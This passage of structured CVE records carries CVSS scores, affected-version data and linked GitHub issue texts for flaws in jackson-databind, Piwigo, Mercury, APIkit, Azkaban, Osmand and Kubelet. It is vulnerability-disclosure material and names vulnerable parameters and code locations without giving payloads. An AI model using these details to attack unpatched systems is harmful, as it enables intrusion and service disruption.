"versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.0.2.25:*:*:*:*:*:*:*", "matchCriteriaId": "72F28CE3-F835-4458-8D70-CBE9FC2F7E7A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:insurance_policy_administration_j2ee:11.1.0.15:*:*:*:*:*:*:*", "matchCriteriaId": "9F058FDA-04BC-4F32-830D-206983770692", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:*", "matchCriteriaId": "6E46AE88-E9F8-41CB-B15F-12F5127A1E8D", "versionEndExcluding": "9.2.4.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:*", "matchCriteriaId": "A3D635AE-5E4A-47FB-9FCA-D82D52A61367", "versionEndExcluding": "9.2.4.2", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:*", "matchCriteriaId": "08FA59A8-6A62-4B33-8952-D6E658F8DAC9", "versionEndExcluding": null, "versionEndIncluding": "17.12", "versionStartExcluding": null, "versionStartIncluding": "17.7", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:*", "matchCriteriaId": "D55A54FD-7DD1-49CD-BE81-0BE73990943C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:*", "matchCriteriaId": "82EB08C0-2D46-4635-88DF-E54F6452D3A3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:*", "matchCriteriaId": "202AD518-2E9B-4062-B063-9858AE1F9CE2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:primavera_unifier:19.12:*:*:*:*:*:*:*", "matchCriteriaId": "10864586-270E-4ACF-BDCC-ECFCD299305F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_merchandising_system:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "792DF04A-2D1B-40B5-B960-3E7152732EB8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_sales_audit:14.1:*:*:*:*:*:*:*", "matchCriteriaId": "7DA6E92C-AC3B-40CF-96AE-22CD8769886F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_service_backbone:14.1:*:*:*:*:*:*:*", "matchCriteriaId": "378A6656-252B-4929-83EA-BC107FDFD357", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_service_backbone:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "363395FA-C296-4B2B-9D6F-BCB8DBE6FACE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_service_backbone:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "F62A2144-5EF8-4319-B8C2-D7975F51E5FA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "11DA6839-849D-4CEF-85F3-38FE75E07183", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "BCE78490-A4BE-40BD-8C72-0A4526BBD4A4", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:17.0:*:*:*:*:*:*:*", "matchCriteriaId": "55AE3629-4A66-49E4-A33D-6D81CC94962F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:18.0:*:*:*:*:*:*:*", "matchCriteriaId": "4CB39A1A-AD29-45DD-9EB5-5E2053A01B9A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:retail_xstore_point_of_service:19.0:*:*:*:*:*:*:*", "matchCriteriaId": "27C26705-6D1F-4D5E-B64D-B479108154FF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "F14A818F-AA16-4438-A3E4-E64C9287AC66", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "4A5BB153-68E0-4DDA-87D1-0D9AB7F0A418", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2642
[ "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
Another gadget type reported regarding a class in `javax.swing` package.. See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem. Mitre id: CVE-2020-10969 Reporters: threedr3am Fix will be included in: * 2.9.10.4 * 2.8.11.6 (`jackson-bom` version `2.8.11.20200310`) * 2.7.9.7 * Does not affect 2.10.0 and later
Block one more gadget type (javax.swing, CVE-2020-10969)
https://api.github.com/repos/FasterXML/jackson-databind/issues/2642/comments
5
2020-03-04T00:05:00Z
2020-04-02T00:24:11Z
https://github.com/FasterXML/jackson-databind/issues/2642
575,038,970
2,642
1,137
CVE-2020-9467
2020-03-26T20:15:11.427
Piwigo 2.10.1 has stored XSS via the file parameter in a /ws.php request because of the pwg.images.setInfo function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 3.5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 6.8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/159191/Piwigo-2.10.1-Cross-Site-Scripting.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1168" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/159191/Piwigo-2.10.1-Cross-Site-Scripting.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/Piwigo/Piwigo/issues/1168" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:2.10.1:*:*:*:*:*:*:*", "matchCriteriaId": "8E8B6457-1AF4-4B29-AF6E-9682E45BB2A9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/Piwigo/Piwigo/issues/1168
[ "Patch", "Third Party Advisory" ]
github.com
[ "Piwigo", "Piwigo" ]
on `file` param. No worry with an admin, but this method can be used by a community user as well. Originally reported by Zak S. see CVE-2020-9467
stored XSS with pwg.images.setInfo
https://api.github.com/repos/Piwigo/Piwigo/issues/1168/comments
1
2020-03-24T13:03:01Z
2020-03-28T05:54:16Z
https://github.com/Piwigo/Piwigo/issues/1168
586,943,552
1,168
1,138
CVE-2020-9468
2020-03-26T20:15:11.473
The Community plugin 2.9.e-beta for Piwigo allows users to set image information on images in albums for which they do not have permission, by manipulating the image_id parameter.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/plegall/Piwigo-community/issues/49" }, { "source": "cve@mitre.org", "tags": [ "Release Notes" ], "url": "https://piwigo.org/ext/extension_view.php?eid=303" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/plegall/Piwigo-community/issues/49" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes" ], "url": "https://piwigo.org/ext/extension_view.php?eid=303" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:2.9.0:e-beta:*:*:*:*:*:*", "matchCriteriaId": "43076B11-9615-4DB5-9C54-7105AD92F0AF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "639" ]
639
https://github.com/plegall/Piwigo-community/issues/49
[ "Patch", "Third Party Advisory" ]
github.com
[ "plegall", "Piwigo-community" ]
CVE-2020-9468 reported by Zak S. > Further, a malicious user can modify the value of the 'image_id' parameter to any existing image id. There are no access controls to prevent a user from manipulating information on images that are in albums to which they do not have access.
[security] ability to by-pass protection on photo edition
https://api.github.com/repos/plegall/Piwigo-community/issues/49/comments
1
2020-03-24T13:19:57Z
2020-04-01T14:24:09Z
https://github.com/plegall/Piwigo-community/issues/49
586,954,137
49
1,139
CVE-2020-10990
2020-03-27T00:15:11.230
An XXE issue exists in Accenture Mercury before 1.12.28 because of the platformlambda/core/serializers/SimpleXmlParser.java component.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/Accenture/mercury/commit/f647a01347485d2afe3a0b735eab3d0121d61f46" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Accenture/mercury/issues/13" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch" ], "url": "https://github.com/Accenture/mercury/commit/f647a01347485d2afe3a0b735eab3d0121d61f46" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Accenture/mercury/issues/13" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:accenture:mercury:*:*:*:*:*:*:*:*", "matchCriteriaId": "FF086E55-CE2C-4263-8F20-DEC1D8118949", "versionEndExcluding": "1.12.28", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "611" ]
611
https://github.com/Accenture/mercury/issues/13
[ "Third Party Advisory" ]
github.com
[ "Accenture", "mercury" ]
@n33dle and I found a security vulnerability within the mercury project. We were hoping to get a core maintainer's contact details to responsibly disclose this vulnerability.
Security Contact Requested
https://api.github.com/repos/Accenture/mercury/issues/13/comments
4
2020-01-06T00:12:35Z
2020-02-26T18:21:09Z
https://github.com/Accenture/mercury/issues/13
545,486,919
13
1,140
CVE-2020-10991
2020-03-27T00:15:11.310
Mulesoft APIkit through 1.3.0 allows XXE because of validation/RestXmlSchemaValidator.java
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mulesoft/apikit/issues/547" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mulesoft/apikit/issues/547" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mulesoft:aplkit:*:*:*:*:*:*:*:*", "matchCriteriaId": "D36CCEC3-85DA-40B8-9508-D8B0C355FC52", "versionEndExcluding": null, "versionEndIncluding": "1.3.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "611" ]
611
https://github.com/mulesoft/apikit/issues/547
[ "Exploit", "Third Party Advisory" ]
github.com
[ "mulesoft", "apikit" ]
While reading the code in the apikit project we (@n33dle and I) identified a vulnerability we wanted to raise. The vulnerability is an XXE vulnerability (https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing) and can be identified in the lines of code below: https://github.com/mulesoft/apikit/blob/8b3839455198bcb7ff9bf108f3eec906d794222c/mule-module-apikit/src/main/java/org/mule/module/apikit/validation/RestXmlSchemaValidator.java#L150-L158
XXE in apikit
https://api.github.com/repos/mulesoft/apikit/issues/547/comments
1
2020-03-25T08:01:53Z
2020-07-17T13:49:52Z
https://github.com/mulesoft/apikit/issues/547
587,511,988
547
1,141
CVE-2020-10992
2020-03-27T00:15:11.370
Azkaban through 3.84.0 allows XXE, related to validator/XmlValidatorManager.java and user/XmlUserManager.java.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/azkaban/azkaban/issues/2478" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/azkaban/azkaban/issues/2478" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:azkaban_project:azkaban:*:*:*:*:*:*:*:*", "matchCriteriaId": "4D087C92-3261-4503-814E-C3D422789367", "versionEndExcluding": null, "versionEndIncluding": "3.84.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "611" ]
611
https://github.com/azkaban/azkaban/issues/2478
[ "Exploit", "Third Party Advisory" ]
github.com
[ "azkaban", "azkaban" ]
While reading the code in the Azkaban project we (@n33dle and I) identified a vulnerability we wanted to raise. The vulnerability is an XXE vulnerability (https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing) and can be identified in the lines of code below: https://github.com/azkaban/azkaban/blob/7efe67b0602fdc65f18fc0e2f91e14a57c2d845e/azkaban-common/src/main/java/azkaban/project/validator/XmlValidatorManager.java#L144 https://github.com/azkaban/azkaban/blob/master/azkaban-common/src/main/java/azkaban/user/XmlUserManager.java#L110
XXE in Azkaban
https://api.github.com/repos/azkaban/azkaban/issues/2478/comments
1
2020-03-25T08:03:26Z
2020-03-30T02:00:01Z
https://github.com/azkaban/azkaban/issues/2478
587,512,802
2,478
1,142
CVE-2020-10993
2020-03-27T00:15:11.717
Osmand through 2.0.0 allow XXE because of binary/BinaryMapIndexReader.java.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/osmandapp/Osmand/issues/8711" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/osmandapp/Osmand/issues/8711" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:osmand:osmand:*:*:*:*:*:*:*:*", "matchCriteriaId": "512C2377-8AA5-41DD-A571-61D210621890", "versionEndExcluding": null, "versionEndIncluding": "2.0.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "611" ]
611
https://github.com/osmandapp/Osmand/issues/8711
[ "Exploit", "Third Party Advisory" ]
github.com
[ "osmandapp", "Osmand" ]
While reading the code in the Osmand project we (@n33dle and I) identified a vulnerability we wanted to raise. The vulnerability is an XXE vulnerability (https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing) and can be identified in the lines of code below: https://github.com/osmandapp/Osmand/blob/963acad11fd80c24549cfcfa3b9596769864696a/OsmAnd-java/src/main/java/net/osmand/binary/BinaryMapIndexReader.java#L2205-L2219
XXE in Osmand
https://api.github.com/repos/osmandapp/OsmAnd/issues/8711/comments
1
2020-03-25T08:02:39Z
2020-05-08T22:41:09Z
https://github.com/osmandapp/OsmAnd/issues/8711
587,512,395
8,711
1,143
CVE-2020-8551
2020-03-27T15:15:12.647
The Kubelet component in versions 1.15.0-1.15.9, 1.16.0-1.16.6, and 1.17.0-1.17.2 has been found to be vulnerable to a denial of service attack via the kubelet API, including the unauthenticated HTTP read-only API typically served on port 10255, and the authenticated HTTPS API typically served on port 10250.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 3.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 6.5, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "LOW", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "jordan@liggitt.net", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "ADJACENT_NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "jordan@liggitt.net", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/89377" }, { "source": "jordan@liggitt.net", "tags": null, "url": "https://groups.google.com/forum/#%21topic/kubernetes-security-announce/2UOlsba2g0s" }, { "source": "jordan@liggitt.net", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3SOCLOPTSYABTE4CLTSPDIFE6ZZZR4LX/" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200413-0003/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/89377" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://groups.google.com/forum/#%21topic/kubernetes-security-announce/2UOlsba2g0s" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3SOCLOPTSYABTE4CLTSPDIFE6ZZZR4LX/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200413-0003/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "44ECF71D-7483-45B0-8BF5-92284C11696C", "versionEndExcluding": null, "versionEndIncluding": "1.15.9", "versionStartExcluding": null, "versionStartIncluding": "1.15.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "02C07F21-ECB7-4BD2-85AF-C2BB24F175FF", "versionEndExcluding": null, "versionEndIncluding": "1.16.6", "versionStartExcluding": null, "versionStartIncluding": "1.16.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "DE0FF258-1EFA-4FF0-84C7-B2976BD70BD3", "versionEndExcluding": null, "versionEndIncluding": "1.17.2", "versionStartExcluding": null, "versionStartIncluding": "1.17.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/kubernetes/kubernetes/issues/89377
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: [CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) (Medium) The Kubelet has been found to be vulnerable to a denial of service attack via the kubelet API, including the unauthenticated HTTP read-only API typically served on port 10255, and the authenticated HTTPS API typically served on port 10250. ### Am I vulnerable? If an attacker can make a request to an unpatched kubelet, then you may be vulnerable to this. #### Affected Versions - kubelet v1.17.0 - v1.17.2 - kubelet v1.16.0 - v1.16.6 - kubelet v1.15.0 - v1.15.9 ### How do I mitigate this vulnerability? Limit access to the Kubelet API or patch the Kubelet. #### Fixed Versions - v1.17.3 - v1.16.7 - v1.15.10 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster #### Acknowledgements This vulnerability was reported by: Henrik Schmidt /area security /kind bug /committee product-security /sig node /area kubelet
CVE-2020-8551: Kubelet DoS via API
https://api.github.com/repos/kubernetes/kubernetes/issues/89377/comments
7
2020-03-23T18:34:40Z
2021-12-02T22:55:29Z
